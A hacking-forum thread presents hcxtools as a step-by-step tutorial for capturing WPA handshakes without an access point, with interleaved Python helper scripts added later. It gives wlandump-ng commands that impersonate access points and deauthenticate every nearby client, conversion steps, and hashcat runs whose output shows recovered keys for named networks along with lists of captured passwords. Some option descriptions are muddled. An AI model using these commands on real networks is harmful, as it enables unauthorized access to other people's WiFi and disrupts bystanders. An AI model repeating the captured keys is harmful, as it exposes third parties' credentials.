
AP-less attack with hcxtools


freeroute
Moderator
Status: Trusted
Joined: Sat, 16 Jul 2016
Posts: 2325
Reputation: 7872
Sun, 12 Nov 2017 @ 10:18:36

Hcxtools is a complete suite of tools to capture and convert packets from possible WiFi devices. It's a command line tool, developed for UNIX users. It doesn't work on MS Windows machines. With these tools we are able to capture 4-way handshakes, analyze captured cap and hccapx files, convert cap and hccap files to hccapx or John the Ripper format and back, strip BSSID, ESSID, OUI, MESSAGE PAIR, etc. We can generate possible password candidates. It has a built-in "whoismac" function to show vendor information.

What are hcxtools: hcxtools are able to get the handshakes (capture only M1-M2) without Access Points (AP), using the client's probe requests. Once a client has successfully connected to an AP earlier, it has saved this AP's name (SSID) to its cache, and then we can find the password using hashcat. Many users think the old aircrack way and look for a beacon and a probe response from the AP. That is not necessary, because the probe request, (re)association request, (re)association response and the M2 contain every piece of information we need.

Important info again: M2 contains every information we need!

Also, hcxtools are able to capture and save possible plain master keys (PMK) from WLAN traffic (hashcat mode: 2501).
We can attack and crack the last part of a WPA ENTERPRISE authentication. Hcxtools can capture half or incomplete "passwords" from which we can calculate the right password.

Example: the user typed the first 8 digits of his password, but the real password is 16 digits.

We got 10 handshakes from the client, but only one is crackable using 8 digits. If we know that the default keyspace for this router is 16 digits, we can try:
12345678?d?d?d?d?d?d?d?d
and are able to crack the remaining 9 handshakes.

Supported hashcat hash-modes: 2500, 2501, 4800, 5500, 12000.
Source: https://github.com/ZerBea/hcxtools

Background:
In a normal situation the WiFi clients (supplicants) try to discover the network by scanning all possible channels and listening to beacons (passive scanning) in order to find a known network (SSID). However, this is not considered to be very efficient. There is another way to enhance this discovery process: supplicants often use active scanning. In active scanning, supplicants still go through each channel in turn, but instead of passively listening to the signals on that frequency, the station sends different kinds of Probe Request management frames asking what network is available on that channel. Once a Probe is sent, the supplicant starts a ProbeTimer countdown and waits for answers. At the end of the timer, the supplicant processes the answers it has received. If no answers are received, the supplicant moves to the next channel and repeats the discovery process. Supplicants sending a Probe Request may specify the SSID they are looking for (directed probe request). Then only IBSS STAs or APs supporting that SSID will answer. The SSID value can also be set to 0 (i.e. the SSID field is present, but empty). This is called a Wildcard SSID or Null Probe Request.

Undirected Probe Request frame to a single AP:
ff:ff:ff:ff:ff:ff from 11:22:33:44:55:66 SSID: Networkname

Undirected Probe Request frame to all APs:
ff:ff:ff:ff:ff:ff from 11:22:33:44:55:66 SSID: Broadcast

Directed Probe Request frame to a single AP:
aa:bb:cc:dd:ee:ff from 11:22:33:44:55:66 SSID: Networkname

Directed Probe Request frame to a single AP:
aa:bb:cc:dd:ee:ff from 11:22:33:44:55:66 SSID: Broadcast

With hcxtools - answering every probe request - a client will try to connect to us. In that situation we are the access point. We need to get the M2 from the client (as it contains every piece of information we need).

The authentication process workflow in the normal case:
- the client sends a probe request
- the AP responds by sending a probe response
- the client sends an authentication request
- the AP responds to the authentication request
- the client sends an association request
- the AP acknowledges and sends an authentication response followed by the M1
- the client acknowledges and sends the M2
- if the M2 is ok, the AP acknowledges and sends the M3 (that means the client is authenticated)
- if the M3 is ok, the client acknowledges and sends the M4 (that means the AP is authenticated)
From this point on the data transfer can begin.

In our case: the client wants to connect to the fake AP (hcxtools - wlandump-ng)
- wlandump-ng - Station: send associationrequest
- wlandump-ng - Station: send acknowledge (client knows that the AP received his packets)
- wlandump-ng - Station: send M1
- wlandump-ng - Station: send acknowledge (AP knows that the client received his packets)
- wlandump-ng - Station: send M2
- wlandump-ng - Station: send acknowledge (AP knows that the client received his packets)

So we can capture M1/M2; it is unauthenticated, but crackable.

Note: This AP-less attack is outdated on the latest devices, as they are running countermeasures against fake APs. Development of a new updated wlandump-ng is in progress (attack against this kind of authentication).

Step by step tutorial:

1. Put our wireless card into monitor mode (in our case wlan1) and stop wpa-supplicant.service and network-manager.service.

Note:
we have to identify all services that take access to the capture device and stop them.

2. Capture handshakes: wlandump-ng -i $WLANDEV -o $ARCHIVNAME.cap -c 1 -t 4 -E 4 -d -D -R -U -B -s

Note: There are 3 different modes with wlandump-ng: active scanning, passive scanning and mobile mode.

Active scanning: wlandump-ng attacks everything - deauthentication/disassociation stops when 4 complete handshakes have been retrieved.
Command: wlandump-ng -i wlan1 -o ARCHIVNAME.cap -c 1 -t 4 -E 4 -D -d -R -U -B -s

Passive scanning: Passive mode is for situations where it isn't allowed to transmit. It is like airodump-ng. We can use this mode for surveillance to get new clients. No emissions go out. No neighbours are disturbed.
Command: wlandump-ng -i $WLANDEV -o $ARCHIVNAME.cap -c 1 -t 120 -R -B -s

Mobile mode: wlandump-ng -i $WLANDEV -o $ARCHIVNAME.cap -c 1 -t 4 -D -d -E 2 -R -U -B -s

To finish capturing press CTRL+C.

3. Analyze captured handshakes: wlancapinfo -i $ARCHIVNAME.cap or wlanhcxinfo -i $ARCHIVNAME.hccapx

4. Convert the captured handshake to hashcat format: wlancap2hcx -o $ARCHIVNAME.hccapx -e testlist -f pmklist -u username_list -S hashinfo $ARCHIVNAME.cap

Note:
-e option: save possible captured passwords and SSIDs
-f option: save captured PMKs
-u option: save captured usernames (in case of WPA ENTERPRISE authentication)
-S option: save hashinfo

5. Analyze the hccapx file: wlanhcxinfo -i $ARCHIVNAME.hccapx

Note: For more detailed information I suggest using: wlanhcxinfo -i $ARCHIVNAME.hccapx -a -s -e -p -R -M

6. Sort and uniq the testlist: sort -u testlist >testlist_sorted

7. Run hashcat with mode 2500:
- first test the captured testlist - hashcat attack mode 0 or 3
- second use a WPA dictionary with rules or masks

Note: if wlanhcxinfo shows that "hashcat --nonce-error-corrections is working on that file", we should use this option with hashcat for a better hit rate.

8. Run hashcat with mode 2501 to test the captured PMKs.

9. Put our wireless card back into managed mode and start the stopped services again, in our case wpa-supplicant.service and network-manager.service.

hcxtools contain wlancapinfo/wlanhcxinfo to analyze captured handshakes.
Let's analyse the hccapx: wlanhcxinfo -i 2238_1507453996.hccapx

total hashes read from file.......: 5
wlandump-ng forced handshakes.....: 0
zeroed ESSID......................: 0
802.1x Version 2001...............: 5
802.1x Version 2004...............: 0
WPA1 RC4 Cipher, HMAC-MD5.........: 0
WPA2 AES Cipher, HMAC-SHA1........: 5
WPA2 AES Cipher, AES-128-CMAC.....: 0
Group keys........................: 0
message pair M12E2................: 2 (0 not replaycount checked)
message pair M14E4................: 0 (0 not replaycount checked)
message pair M32E2................: 3 (0 not replaycount checked)
message pair M32E3................: 0 (0 not replaycount checked)
message pair M34E3................: 0 (0 not replaycount checked)
message pair M34E4................: 0 (0 not replaycount checked)
hashcat --nonce-error-corrections is working on that file

We have 2 not authenticated handshakes and 3 authenticated handshakes.

Let's take a look at the anonces (wlanhcxinfo shows that nonce correction is possible):
wlanhcxinfo -i 2238_1507453996.hccapx -a -A

bc7574c9d730:bf45c5b013df8891ba34345daca63d14136d06424188e0f7883e25293881bd62
bc7574c9d730:bf45c5b013df8891ba34345daca63d14136d06424188e0f7883e25293881bd63
bc7574c9d730:bf45c5b013df8891ba34345daca63d14136d06424188e0f7883e25293881bd63
bc7574c9d730:bf45c5b013df8891ba34345daca63d14136d06424188e0f7883e25293881bd64
bc7574c9d730:bf45c5b013df8891ba34345daca63d14136d06424188e0f7883e25293881bd64

Take a look at the last byte: if we choose nonce-error-correction = 2 we can use every combination and have a valid message_pair.

We can do: wlanhcx2ssid -i 2238_1507453996.hccapx -N valid1.hccapx

Note:
the -N option means: output a stripped file (only one record for each mac_ap, mac_sta, essid, message_pair combination)

Now we have only 2 records (one for each connected client). Running hashcat with nonce-error-corrections 2 on them gave me:

Session..........: hashcat
Status...........: Cracked
Hash.Type........: WPA/WPA2
Hash.Target......: /home/user/WLAN/Hash/valid1.hccapx
Time.Started.....: Sun Oct 8 15:45:51 2017 (0 secs)
Time.Estimated...: Sun Oct 8 15:45:51 2017 (0 secs)
Guess.Base.......: File (/home/user/WLAN/Passwortlisten/WPA_list)
Guess.Queue......: 1/1 (100.00%)
Speed.Dev.#1.....: 484.9 kH/s (2.56ms)
Recovered........: 2/2 (100.00%) Digests, 1/1 (100.00%) Salts
Progress.........: 85744/85744 (100.00%)
Rejected.........: 152/85744 (0.18%)
Restore.Point....: 0/85744 (0.00%)
Candidates.#1....: !5urlaub26! -> найден
HWMon.Dev.#1.....: Temp: 44c Fan: 33% Util: 62% Core:1835MHz Mem:5005MHz Bus:16

and the key is:
60c0b1cb2a9fbe3bde6c466414d47160:bc7574c9d730:2c8a725b0da6:Telekom-K3VGCK:57680186
9da67d738d869721cfe72aec48c681ae:bc7574c9d730:2c8a725b0da6:Telekom-K3VGCK:57680186

Possible output logs:
- found Fast BSS transition (fast roaming) - we can attack the client with KRACK
- found WDS or Mesh packets - detected WDS/Mesh packet. Information only.
- found WPS Authentication - not implemented yet. Information only.

More detailed information can be found on the hashcat forum ("hcxtools - solution for capturing wlan traffic and conversion to hashcat formats") or on GitHub.

Thank you ZerBea for contributing to the writing of this post and for developing this great tool.



If I helped a +rep is appreciated!

: 13hDMK85KhVnPb2eTFBacHD6kDjKYFLudb
XMPP: freeroute@xmpp.jp
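The "take a look at the last byte" check from the post above, done programmatically. This is an added example of mine, not code from the post or from hcxtools: it parses the mac_ap:anonce lines that wlanhcxinfo -a -A prints, reads the last four anonce bytes as a 32-bit counter in both byte orders (the two cases hcxtools later labels LE and BE) and reports the spread, which is the smallest --nonce-error-corrections value that covers every captured anonce. The five sample lines are the post's own records re-joined; the line format regex and the rule that only anonces sharing their first 28 bytes are compared are my assumptions.

```python
import re
from collections import defaultdict

# Constructed sample: the five records printed above by wlanhcxinfo -a -A,
# one "mac_ap:anonce" per line.
SAMPLE = """\
bc7574c9d730:bf45c5b013df8891ba34345daca63d14136d06424188e0f7883e25293881bd62
bc7574c9d730:bf45c5b013df8891ba34345daca63d14136d06424188e0f7883e25293881bd63
bc7574c9d730:bf45c5b013df8891ba34345daca63d14136d06424188e0f7883e25293881bd63
bc7574c9d730:bf45c5b013df8891ba34345daca63d14136d06424188e0f7883e25293881bd64
bc7574c9d730:bf45c5b013df8891ba34345daca63d14136d06424188e0f7883e25293881bd64
"""

# 12 hex digits of AP MAC, a colon, 64 hex digits of anonce (assumed format).
LINE_RE = re.compile(r"^([0-9a-f]{12}):([0-9a-f]{64})$")


def parse_anonces(text):
    """Return {mac_ap: [anonce as bytes, ...]}; malformed lines are skipped."""
    out = defaultdict(list)
    for line in text.splitlines():
        m = LINE_RE.match(line.strip().lower())
        if m:
            out[m.group(1)].append(bytes.fromhex(m.group(2)))
    return dict(out)


def counter_spread(anonces, byteorder):
    """Spread (max - min) of the last 4 anonce bytes read as a 32-bit counter
    in the given byte order. Only anonces sharing their first 28 bytes can be
    related by a counter; if they differ there, return None."""
    if len({a[:28] for a in anonces}) != 1:
        return None
    vals = [int.from_bytes(a[28:], byteorder) for a in anonces]
    return max(vals) - min(vals)


def recommend_nonce_correction(anonces):
    """Smallest --nonce-error-corrections value that spans every captured
    anonce, together with the byte order under which it does so, or None
    when the anonces are not counter-related at all."""
    candidates = []
    for order in ("big", "little"):
        spread = counter_spread(anonces, order)
        if spread is not None:
            candidates.append((spread, order))
    return min(candidates) if candidates else None


if __name__ == "__main__":
    for mac_ap, anonces in parse_anonces(SAMPLE).items():
        print(mac_ap, len(anonces), "anonces ->", recommend_nonce_correction(anonces))
```

For the post's five records this prints a spread of 2 in big-endian order (the last byte runs 62..64), which is exactly the nonce-error-correction value the author picks; the little-endian reading gives a spread of 0x02000000 and is rejected by the minimum. Random per-session anonces from the same AP will differ in their first 28 bytes and yield None, which tells you corrections cannot help.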

jimbas
Status: Trusted
Joined: Sat, 26 Mar 2016
Posts: 830
Reputation: 1357
Mon, 13 Nov 2017 @ 16:18:13

+1!
very nice explanation!!


BTC: 3F78Wk7GhnWAzAsrUw6uUeXZ3PzyuAvkm7
BCH: 33tuLY5u8drRkgP4pVeFupPrV8bSV5xaqY

freeroute (Moderator)
Tue, 21 Nov 2017 @ 20:40:07

Upcoming versions of the 3rd generation hcxtools - status "testing": https://github.com/ZerBea/hcxtoolsbleeding

The authentication engine was completely rewritten and some options were changed or removed.

The new authentication sequence can be read here, because HTML code is not allowed.

Command line options:
-i interface: interface
-o dump file: output file in pcapformat including radiotap header (LINKTYPE_IEEE802_11_RADIOTAP)
-c digit: set channel (default = channel 1)
-2: scan 2.4 GHz channels (default scan off) 1, 3, 5, 7, 9, 11, 6, 2, 4, 12, 8, 10, 13,
-5: scan 5 GHz channels (default scan off) 36, 40, 44, 48, 52, 56, 60, 64, 100, 104, 108, 112, 116, 120, 124, 128, 132, 136, 140, 149, 153, 157, 161, 165
-t seconds: stay time on channel before hopping to the next channel (default = 5 seconds)
-B file: blacklist (do not deauthenticate clients from this hosts - format: xxxxxxxxxxxx)
-I: show suitable wlan interfaces and quit
-T maxerrors: terminate after xx maximal errors (default: 1000)
-P: enable poweroff
-s: enable status messages
-h: show this help
-v: show version

Forum: https://hashcat.net/forum/thread-6661-post-37629.html#pid37629



freeroute (Moderator)
Wed, 22 Nov 2017 @ 13:36:07

If you have free time please test hcxtoolsbleeding with your clients or access points.

You should retrieve M2s from all KRACK-fixed Android devices.
Post the test results here, please.
Thank you very much for your contribution.

How to check for immunity against the attack: the krackattacks-scripts can be found here: https://github.com/vanhoefm/krackattacks-scripts

Note:
These scripts are not attack scripts! You require network credentials in order to test
if an access point or client is affected by the attack.



freeroute (Moderator)
Tue, 19 Dec 2017 @ 22:09:06

UPDATE!
hcxtools moved to v4.0.1 (https://github.com/ZerBea/hcxtools):
added wlandump-rs
- uses raw sockets instead of libpcap
- faster and more aggressive than wlandump-ng
- able to capture more handshakes than wlandump-ng
- automatically uses channel 14 and 5 GHz channels if the driver supports this
- improvements on the scan engine
- improvements on the authentication engine
- uses an AP blacklist instead of BPF

$ wlandump-rs -h
wlandump-rs 4.0.1 (C) 2017 ZeroBeat
usage: wlandump-rs options

options:
-i interface : interface
-o dump file : output file in pcapformat including radiotap header (LINKTYPE_IEEE802_11_RADIOTAP)
-c digit : set channel (default = channel 1)
-t seconds : stay time on channel before hopping to the next channel
: default = 5 seconds
-B file : blacklist (do not deauthenticate clients from this hosts - format: xxxxxxxxxxxx)
-I : show suitable wlan interfaces and quit
-T maxerrors : terminate after xx maximal errors
: default: 1000000
-D : enable to transmit deauthentication- and disassociation-frames
-P : enable poweroff
-s : enable status messages
-h : show this help
-v : show version



PixL
Status: n/a
Joined: Fri, 14 Apr 2017
Posts: 112
Reputation: 10
Sat, 23 Dec 2017 @ 07:24:27

Any chance of these working on OpenWRT instead of a Pi?


BTC: 13kXxHdNutoykbg66c3vb8MwGuLkNGjfAC

1 x GTX 1050

PixL
Sat, 23 Dec 2017 @ 08:06:15

To install these tools on Kali Linux you will want to do the following first...

sudo su
apt-get install libpcap-dev
apt-get install libcurl4-openssl-dev
make
make install



freeroute (Moderator)
Sat, 23 Dec 2017 @ 13:27:40

PixL said:

Any chance of these working on OpenWRT instead of a Pi?

For your information:

"Any chance of these working on OpenWRT instead of a Pi?
Not yet, there are some big endian problems and some other problems.
Some musl fixes are done, but still a long way to go :)"



freeroute (Moderator)
Thu, 22 Feb 2018 @ 07:00:35

UPDATE!

17.02.2018
==========
hcxpcaptool
added nonce fuzzing logic for john and old hashcat (hccap) according to bitmask:
0: MP info
1: MP info
2: MP info
3: x (unused)
4: ap-less attack (set to 1) - no nonce-error-corrections necessary
5: LE router detected (set to 1) - nonce-error-corrections only for LE necessary
6: BE router detected (set to 1) - nonce-error-corrections only for BE necessary
7: not replaycount checked (set to 1) - replaycount not checked, nonce-error-corrections definitely necessary

15.02.2018
==========
hcxpcaptool
added detection of router endianness and ap-less attacks:
bitmask for message_pair file:
0: MP info
1: MP info
2: MP info
3: x (unused)
4: ap-less attack (set to 1) - no nonce-error-corrections necessary
5: LE router detected (set to 1) - nonce-error-corrections only for LE necessary
6: BE router detected (set to 1) - nonce-error-corrections only for BE necessary
7: not replaycount checked (set to 1) - replaycount not checked, nonce-error-corrections definitely necessary

Using bits 4 to 7, hcxtools are able to interact with hashcat - that will increase the speed of hashcat.



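A decoder for the message_pair byte described in the changelog above, plus the 4-bit "bitmask for message" (0001 M1 ... 1000 M4) that hcxpcaptool's help lists later in this thread. This is an added example of mine, not code from hcxtools or hashcat. The message_pair names for values 0 to 5 are taken in the order wlanhcxinfo lists them in the first post (M12E2, M14E4, M32E2, M32E3, M34E3, M34E4), the flag bits are the ones the changelog documents, and the "nonce_correction" recommendation is my reading of the changelog's wording for each bit; the sample byte values are constructed.

```python
from collections import Counter

# message_pair values 0..5 (bits 0-2), in the order wlanhcxinfo lists them.
MESSAGE_PAIRS = {0: "M12E2", 1: "M14E4", 2: "M32E2", 3: "M32E3", 4: "M34E3", 5: "M34E4"}

# Flag bits 4..7 from the 15.02.2018 / 17.02.2018 changelog entries.
FLAG_APLESS = 1 << 4   # ap-less attack: no nonce-error-corrections necessary
FLAG_LE = 1 << 5       # LE router detected: corrections only for LE necessary
FLAG_BE = 1 << 6       # BE router detected: corrections only for BE necessary
FLAG_NO_RC = 1 << 7    # replaycount not checked: corrections definitely necessary


def decode_message_pair(value):
    """Decode one message_pair byte into its fields and the
    --nonce-error-corrections recommendation the flag bits imply."""
    if not 0 <= value <= 0xFF:
        raise ValueError("message_pair is a single byte")
    mp = value & 0x07
    apless = bool(value & FLAG_APLESS)
    le = bool(value & FLAG_LE)
    be = bool(value & FLAG_BE)
    rc_checked = not (value & FLAG_NO_RC)
    if apless:
        rec = "not needed"
    elif not rc_checked:
        rec = "required"
    elif le and not be:
        rec = "LE only"
    elif be and not le:
        rec = "BE only"
    else:
        rec = "as needed"
    return {
        "message_pair": MESSAGE_PAIRS.get(mp, f"unknown({mp})"),
        "authenticated": mp != 0,   # M12E2 (M1/M2 only) is the unauthenticated case
        "ap_less": apless,
        "le_router": le,
        "be_router": be,
        "replaycount_checked": rc_checked,
        "nonce_correction": rec,
    }


# hcxpcaptool's "bitmask for message": one bit per EAPOL message seen.
MESSAGE_BITS = {1: "M1", 2: "M2", 4: "M3", 8: "M4"}


def decode_message_mask(mask):
    """Return the names of the EAPOL messages whose bits are set in mask."""
    return [name for bit, name in MESSAGE_BITS.items() if mask & bit]


def summarize(values):
    """Per-message_pair (count, not-replaycount-checked) tuples, in the
    spirit of the wlanhcxinfo summary quoted in the first post."""
    pairs, unchecked = Counter(), Counter()
    for v in values:
        d = decode_message_pair(v)
        pairs[d["message_pair"]] += 1
        if not d["replaycount_checked"]:
            unchecked[d["message_pair"]] += 1
    return {name: (pairs[name], unchecked[name]) for name in MESSAGE_PAIRS.values()}


if __name__ == "__main__":
    # Constructed sample: two ap-less M12E2 records and three M32E2 records,
    # one of which was not replaycount checked (values are made up).
    sample = [0x10, 0x10, 0x02, 0x02, 0x82]
    for v in sample:
        print(f"0x{v:02x}: {decode_message_pair(v)}")
    print(summarize(sample))
```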

PixL
Thu, 22 Feb 2018 @ 18:25:29

I really like these tools and wlandump-ng is VERY effective....however what are the benefits between wlandump-ng and hcxdumptool?



freeroute (Moderator)
Tue, 05 Jun 2018 @ 10:56:13

hcxpcaptool for detecting an attack on an IEEE 802.11 network system.


Usage:
hcxpcaptool options
hcxpcaptool options [input.pcap] [input.pcap] ...
hcxpcaptool options *.cap
hcxpcaptool options *.*

Options:
-o file : output hccapx file (hashcat -m 2500/2501)
-O file : output raw hccapx file (hashcat -m 2500/2501)
-x file : output hccap file (hashcat -m 2500)
-X file : output raw hccap file (hashcat -m 2500)
-j file : output john WPAPSK-PMK file (john wpapsk-opencl)
-J file : output raw john WPAPSK-PMK file (john wpapsk-opencl)
-E file : output wordlist (autohex enabled) to use as input wordlist for cracker
-I file : output unsorted identity list
-U file : output unsorted username list
-P file : output possible WPA/WPA2 plainmasterkey list
-T file : output management traffic information list
: european date : timestamp : mac_sta : mac_ap : essid
-H file : output dump raw packets in hex
-V : verbose (but slow) status output
-h : show this help
-v : show version

--time-error-corrections=digit : maximum allowed time gap (default: 600s)
--nonce-error-corrections=digit : maximum allowed nonce gap (default: 8)
: should be the same value as in hashcat
--netntlm-out=file : output netNTLMv1 file (hashcat -m 5500, john netntlm)
--md5-out=file : output MD5 challenge file (hashcat -m 4800)
--md5-john-out=file : output MD5 challenge file (john chap)
--tacacsplus-out=file : output TACACS+ authentication file (hashcat -m 16100, john tacacs-plus)

bitmask for message:
0001 M1
0010 M2
0100 M3
1000 M4

Attention!
Do not use hcxpcaptool in combination with third party cap/pcap/pcapng cleaning tools!

time-error-corrections=digit: Use the same values as in hashcat or JtR.
That means, if you convert the cap to hccapx using --nonce-error-corrections=128
you must(!) use the same value in hashcat.

nonce-error-corrections=digit: the maximum allowed time gap between 2 messages within the authentication.

In case of bad reception, use higher values for both options!
hcxpcaptool doesn't correct the nonce.
Using --nonce-error-corrections reduces the overhead, because only handshakes up to this value
are converted. If you decide to convert up to a value of 256 you will get more handshakes (on crappy reception),
but you also need the same value in hashcat to recover the password from them.

Example:
hcxpcaptool -O hcxdump.hccapx -E wordlist.txt -U usernamelist.txt -T traffixlist.txt -I identitylist.txt -P pmklist *.cap

The "O" option is useful, converting (raw) all handshakes:

- to get more PSKs (with nonce-error-correction and time-error-correction it could find more crackable handshakes (~20% more)).
- to detect online attacks against a network or
- to detect typos of the user or
- incomplete PSKs

hcxpcaptool for detection of an attack against a WiFi network:

If someone probes/tries to connect to an AP with a wrong PSK, hcxtools/hcxdumptool will capture these
handshakes, too. Hashcat is able to crack them, but it will give the wrong PSK for that network.

Note: The first field is very important for hashcat.
It is a special internal md5_64 checksum to make the hash unique. Hashcat and hcxtools use this checksum.
These dupes aren't detected by hashcat pre 4.x!

In this case the hashcat output looks like this (MAC addresses have been modified):

00017f2c088aa76f5c0eee87edf53ce6:9094e43323xx:00738d3fa8xx:sokol:stargate
005a43cb4d97e60c78098d7495aa5028:9094e43323xx:00738d3fa8xx:sokol:maverick
00cf0ca8e9de91523589e297b3a9c156:9094e43323xx:00738d3fa8xx:sokol:rush2112
00e44e97faf8b748aa62fae668f208a5:9094e43323xx:00738d3fa8xx:sokol:asdfasdf
0119561c9feffd1d919c32c9b38a1153:9094e43323xx:00738d3fa8xx:sokol:nicholas
015c16ac09de92418e4849bec41be1a8:9094e43323xx:00738d3fa8xx:sokol:garfield
02c92644089cec030434fac3c1617346:9094e43323xx:00738d3fa8xx:sokol:benjamin
040892cc069a18a2d2dc7a4e6e13efb7:9094e43323xx:00738d3fa8xx:sokol:softball
046facc9e0385c37908f204b2717a974:9094e43323xx:00738d3fa8xx:sokol:kawasaki
04862a351f5b6cbc7c01224ed6dbd10d:9094e43323xx:00738d3fa8xx:sokol:november
0494cc2cfdb4972e8bac5c97815625b3:9094e43323xx:00738d3fa8xx:sokol:1q2w3e4r
049b7427dced2370d56358967353f5cb:9094e43323xx:00738d3fa8xx:sokol:freepass
04afe254cb28c3e34ae35cd85ccebf9f:9094e43323xx:00738d3fa8xx:sokol:qwertyui
0547a8647b4369fc6aac895a2a09e77b:9094e43323xx:00738d3fa8xx:sokol:princess
0552a540524e38664c83077285a3df4c:9094e43323xx:00738d3fa8xx:sokol:steelers
05cf886cb6b8906f0b2159dbaa9a4b49:9094e43323xx:00738d3fa8xx:sokol:westside
05e7f572e62540db96b05daaf5b6f1b2:9094e43323xx:00738d3fa8xx:sokol:rolltide
061c9d44ebab61a8e163faae7f924c6e:9094e43323xx:00738d3fa8xx:sokol:williams
0625cda16779725d619c595069949473:9094e43323xx:00738d3fa8xx:sokol:airborne
0658e898e84434075838c610f79ff77c:9094e43323xx:00738d3fa8xx:sokol:peekaboo
0672af23d54b824dd13569ad9cebf86d:9094e43323xx:00738d3fa8xx:sokol:metallic


Hcxpcaptool for detection of typos of the user, stored in the STA's wpa_supplicant.conf on a WiFi network system:
(To improve the security of the STA, it's important to remove these entries from the STA's wpa_supplicant.conf!)


2269d11a79e9c426bd949ded737cc712:0004edfa94xx:54e43acfc4xx:DewDrop:11111111
00ee1f16bfbb791e0ccaf092b4c30389:0004edfa94xx:54e43acfc4xx:DewDrop:12345678
00876ac1efb086f64846196aa0718033:0004edfa94xx:54e43acfc4xx:DewDrop:aaaaaaaa


Incomplete PSKs:


90647c4a916cbd903020d292419bd182:000c533deexx:d85b2acef6xx:FRITZ!Box Gastzugang:12345678
071dc32276e1cb7fe7eaa0808e38a6e2:000c533deexx:ec59e7f46dxx:FRITZ!Box Gastzugang:11223456789#
8fe545e117cdbef43da486f5499fec10:14cc205964xx:78929c5af7xx:leningrib:gribgrib
b74c4e2f34040334f47b46ae3f6423a9:14cc205964xx:78929c5af7xx:leningrib:gribgribgribgrib



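The three patterns the post above reads out of hashcat's output (many wrong PSKs from one station, incomplete PSKs, and the typo variants) can be flagged automatically. This is an added example of mine, not code from hcxtools or hashcat: it parses lines in the checksum:mac_ap:mac_sta:essid:psk format shown above, groups them per (mac_ap, essid) and reports per network. The sample lines are records quoted in this thread (MACs already masked with xx by the posters), including the ASUS case-variant pair from the next post; the threshold of three distinct PSKs per station and the assumption that the first four fields never contain a colon are mine.

```python
from collections import defaultdict

# Constructed sample: hashcat -m 2500 output lines quoted in this thread.
SAMPLE = """\
00017f2c088aa76f5c0eee87edf53ce6:9094e43323xx:00738d3fa8xx:sokol:stargate
005a43cb4d97e60c78098d7495aa5028:9094e43323xx:00738d3fa8xx:sokol:maverick
00cf0ca8e9de91523589e297b3a9c156:9094e43323xx:00738d3fa8xx:sokol:rush2112
2269d11a79e9c426bd949ded737cc712:0004edfa94xx:54e43acfc4xx:DewDrop:11111111
00ee1f16bfbb791e0ccaf092b4c30389:0004edfa94xx:54e43acfc4xx:DewDrop:12345678
00876ac1efb086f64846196aa0718033:0004edfa94xx:54e43acfc4xx:DewDrop:aaaaaaaa
8fe545e117cdbef43da486f5499fec10:14cc205964xx:78929c5af7xx:leningrib:gribgrib
b74c4e2f34040334f47b46ae3f6423a9:14cc205964xx:78929c5af7xx:leningrib:gribgribgribgrib
90647c4a916cbd903020d292419bd182:000c533deexx:d85b2acef6xx:FRITZ!Box Gastzugang:12345678
413c454695dc49ab612f2ec76ed51ec6:708bcd31caXX:1caba7a283XX:ASUS:mannaburger58
b8f00d319695be543306f04927d528af:708bcd31caXX:64eb8c0016XX:ASUS:MANNABURGER58
60c0b1cb2a9fbe3bde6c466414d47160:bc7574c9d730:2c8a725b0da6:Telekom-K3VGCK:57680186
"""


def parse_hashcat_lines(text):
    """Parse checksum:mac_ap:mac_sta:essid:psk lines. The first four fields
    never contain ':' (assumption), so split at most four times and keep the
    rest as the PSK, which may itself contain colons."""
    recs = []
    for line in text.splitlines():
        parts = line.strip().split(":", 4)
        if len(parts) != 5:
            continue   # blank or malformed line
        checksum, mac_ap, mac_sta, essid, psk = parts
        recs.append({"checksum": checksum, "mac_ap": mac_ap.lower(),
                     "mac_sta": mac_sta.lower(), "essid": essid, "psk": psk})
    return recs


def analyze(recs, guess_threshold=3):
    """Group records by (mac_ap, essid) and flag, per network: one station
    sending many different PSKs, PSKs that are prefixes of longer PSKs
    (incomplete entry) and PSKs that differ only in letter case."""
    by_net = defaultdict(list)
    for r in recs:
        by_net[(r["mac_ap"], r["essid"])].append(r)
    report = {}
    for key, rs in by_net.items():
        psks = sorted({r["psk"] for r in rs})
        findings = []
        per_sta = defaultdict(set)
        for r in rs:
            per_sta[r["mac_sta"]].add(r["psk"])
        for sta, guesses in sorted(per_sta.items()):
            if len(guesses) >= guess_threshold:
                findings.append(f"{sta} tried {len(guesses)} different PSKs "
                                "(online guessing or repeated typos)")
        for short in psks:
            for long in psks:
                if short != long and long.startswith(short):
                    findings.append(f"incomplete PSK: '{short}' is a prefix of '{long}'")
        folded = defaultdict(set)
        for p in psks:
            folded[p.lower()].add(p)
        for variants in folded.values():
            if len(variants) > 1:
                findings.append(f"case variants: {sorted(variants)} "
                                "(lock key active, as in the ASUS example)")
        report[key] = {"psks": psks, "findings": findings}
    return report


if __name__ == "__main__":
    for (mac_ap, essid), info in analyze(parse_hashcat_lines(SAMPLE)).items():
        print(f"{essid} ({mac_ap}): {len(info['psks'])} PSK(s)")
        for f in info["findings"]:
            print("   -", f)
```

Run against the real output of a -O (raw) conversion of your own captures, the networks with findings are the ones worth a look: a station cycling through PSKs against your AP is the online-attack case the post describes, while the prefix and case-variant findings point at stale or mistyped entries in a client's wpa_supplicant.conf that should be removed.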

freeroute (Moderator)
Wed, 06 Jun 2018 @ 07:51:59

This is another nice example from ZerBea:

413c454695dc49ab612f2ec76ed51ec6:708bcd31caXX:1caba7a283XX:ASUS:mannaburger58
b8f00d319695be543306f04927d528af:708bcd31caXX:64eb8c0016XX:ASUS:MANNABURGER58

One of the clients tries to connect with activated numlock on his keyboard.



freeroute (Moderator)
Fri, 22 Jun 2018 @ 14:47:55

hcxtools has been updated: Added full support for TaZmen Sniffer Protocol (TZSP)


$ hcxpcaptool -V tzsp.pcap
start reading from tzsp.pcap

summary:
--------
file name....................: tzsp.pcap
file type....................: pcap 2.4
network type.................: DLT_EN10MB (1)
endianess....................: little endian
read errors..................: flawless
packets inside...............: 15
skipped packets..............: 0
packets with FCS.............: 0
WDS packets..................: 15
EAPOL packets................: 15
IPv4 packets.................: 15
UDP packets..................: 15
TZSP (802.11) packets........: 15

Background: TaZmen Sniffer Protocol (TZSP) is an encapsulation protocol used to wrap other protocols. It is commonly used to wrap 802.11 wireless packets to support Intrusion Detection Systems (IDS), wireless tracking, or other wireless applications.

Source: https://wikivisually.com/wiki/TZSP
and here:
https://github.com/hashcat/hashcat-utils/pull/45



freeroute (Moderator)
Tue, 10 Jul 2018 @ 22:19:22

hcxtools has been updated: https://hashcat.net/forum/thread-6661-post-41092.html#pid41092

hcxpcaptool: added detection of FILS authentication

$ hcxpcaptool -V -I identitylist *.pcapng
start reading from fils-handshake.pcapng
summary:
